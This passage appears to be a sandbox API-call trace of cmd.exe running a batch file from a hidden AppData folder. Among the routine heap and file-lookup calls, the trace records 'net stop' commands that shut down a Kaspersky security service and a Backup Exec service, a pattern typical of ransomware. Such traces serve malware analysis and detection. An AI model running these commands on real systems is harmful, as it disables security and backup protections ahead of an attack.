3 [0200.845] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0200.845] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0200.845] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0200.845] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0200.845] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0200.845] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0200.845] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0200.845] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0200.846] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0200.846] SetErrorMode (uMode=0x0) returned 0x1 [0200.846] GetProcessHeap () returned 0x3e0000 [0200.846] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0200.846] GetProcessHeap () returned 0x3e0000 [0200.846] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0200.846] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.846] GetProcessHeap () returned 0x3e0000 [0200.846] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0200.846] GetProcessHeap () returned 0x3e0000 [0200.846] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0200.847] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.847] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.847] GetLastError () returned 0x2 [0200.847] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.848] GetLastError () returned 0x2 [0200.848] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.848] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.848] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.849] GetLastError () returned 0x2 [0200.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.849] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.850] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.850] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0200.850] SetErrorMode (uMode=0x0) returned 0x1 [0200.850] GetProcessHeap () returned 0x3e0000 [0200.850] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0200.850] GetProcessHeap () returned 0x3e0000 [0200.850] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0200.851] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.851] GetProcessHeap () returned 0x3e0000 [0200.851] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0200.851] GetProcessHeap () returned 0x3e0000 [0200.851] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0200.851] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.851] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.852] GetLastError () returned 0x2 [0200.852] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.852] GetLastError () returned 0x2 [0200.853] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.853] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0200.853] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0200.853] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.854] GetLastError () returned 0x2 [0200.854] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0200.854] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0200.854] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.854] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0200.855] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0200.855] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0200.855] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.855] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop KAVFSGT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop KAVFSGT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop KAVFSGT /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x2ec, dwThreadId=0x874)) returned 1 [0200.859] CloseHandle (hObject=0x78) returned 1 [0200.859] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.859] GetProcessHeap () returned 0x3e0000 [0200.859] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.859] GetEnvironmentStringsW () returned 0x3f8408* [0200.859] GetProcessHeap () returned 0x3e0000 [0200.859] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.859] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.859] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0201.027] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0201.027] CloseHandle (hObject=0x74) returned 1 [0201.027] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0201.027] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0201.027] GetProcessHeap () returned 0x3e0000 [0201.027] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.027] GetEnvironmentStringsW () returned 0x3f8408* [0201.027] GetProcessHeap () returned 0x3e0000 [0201.027] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.028] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.028] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0201.028] GetProcessHeap () returned 0x3e0000 [0201.028] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.028] GetEnvironmentStringsW () returned 0x3f8408* [0201.028] GetProcessHeap () returned 0x3e0000 [0201.028] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.028] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.028] GetProcessHeap () returned 0x3e0000 [0201.028] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0201.028] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0201.028] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.028] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0201.028] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.029] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0201.029] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.029] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0201.029] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.029] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0201.029] SetConsoleInputExeNameW () returned 0x1 [0201.029] GetConsoleOutputCP () returned 0x1b5 [0201.029] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0201.029] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0201.030] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0201.030] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.030] SetFilePointer (in: hFile=0x74, lDistanceToMove=3182, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc6e [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0201.030] GetProcessHeap () returned 0x3e0000 [0201.030] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0201.031] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.031] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc6e [0201.031] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xc53, lpOverlapped=0x0) returned 1 [0201.031] SetFilePointer (in: hFile=0x74, lDistanceToMove=3224, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc98 [0201.031] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=42, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop BackupExecDeviceMediaService /y\r\niceΓÇ¥ /y\r\nures\r\nnded\r\n") returned 42 [0201.031] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.031] GetFileType (hFile=0x74) returned 0x1 [0201.031] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.031] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc98 [0201.031] GetProcessHeap () returned 0x3e0000 [0201.031] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0201.031] GetProcessHeap () returned 0x3e0000 [0201.031] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0201.034] _tell (_FileHandle=3) returned 3224 [0201.034] _close (_FileHandle=3) returned 0 [0201.035] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0201.035] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0201.035] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0201.035] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0201.035] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0201.035] _wcsicmp (_String1="net", _String2="CD") returned 11 [0201.035] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0201.035] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0201.035] _wcsicmp (_String1="net", _String2="REN") returned -4 [0201.035] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0201.035] _wcsicmp (_String1="net", _String2="SET") returned -5 [0201.035] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0201.035] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0201.035] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0201.035] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0201.035] _wcsicmp (_String1="net", _String2="MD") returned 1 [0201.035] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0201.035] _wcsicmp (_String1="net", _String2="RD") returned -4 [0201.035] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0201.035] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0201.035] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0201.035] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0201.035] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0201.035] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0201.035] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0201.035] _wcsicmp (_String1="net", _String2="VER") returned -8 [0201.035] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0201.035] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0201.035] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0201.035] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0201.035] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0201.035] _wcsicmp (_String1="net", _String2="START") returned -5 [0201.035] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0201.035] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0201.035] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0201.035] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0201.036] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0201.036] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0201.036] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0201.036] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0201.036] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0201.036] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0201.036] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0201.036] SetErrorMode (uMode=0x0) returned 0x1 [0201.036] GetProcessHeap () returned 0x3e0000 [0201.036] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0201.036] GetProcessHeap () returned 0x3e0000 [0201.036] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0201.037] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.037] GetProcessHeap () returned 0x3e0000 [0201.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0201.037] GetProcessHeap () returned 0x3e0000 [0201.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0201.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.037] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.037] GetLastError () returned 0x2 [0201.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.038] GetLastError () returned 0x2 [0201.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.039] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.039] GetLastError () returned 0x2 [0201.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.040] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.040] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.041] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0201.041] SetErrorMode (uMode=0x0) returned 0x1 [0201.041] GetProcessHeap () returned 0x3e0000 [0201.041] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0201.041] GetProcessHeap () returned 0x3e0000 [0201.041] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0201.041] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.041] GetProcessHeap () returned 0x3e0000 [0201.041] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0201.041] GetProcessHeap () returned 0x3e0000 [0201.041] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0201.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.042] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.042] GetLastError () returned 0x2 [0201.043] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.043] GetLastError () returned 0x2 [0201.043] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.043] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0201.043] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.044] GetLastError () returned 0x2 [0201.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0201.044] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.045] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.045] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0201.045] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0201.045] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0201.046] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0201.046] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop BackupExecDeviceMediaService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop BackupExecDeviceMediaService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop BackupExecDeviceMediaService /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x548, dwThreadId=0x614)) returned 1 [0201.049] CloseHandle (hObject=0x74) returned 1 [0201.049] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.050] GetProcessHeap () returned 0x3e0000 [0201.050] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.050] GetEnvironmentStringsW () returned 0x3f8408* [0201.050] GetProcessHeap () returned 0x3e0000 [0201.050] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.050] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.050] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0201.174] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0201.174] CloseHandle (hObject=0x78) returned 1 [0201.174] 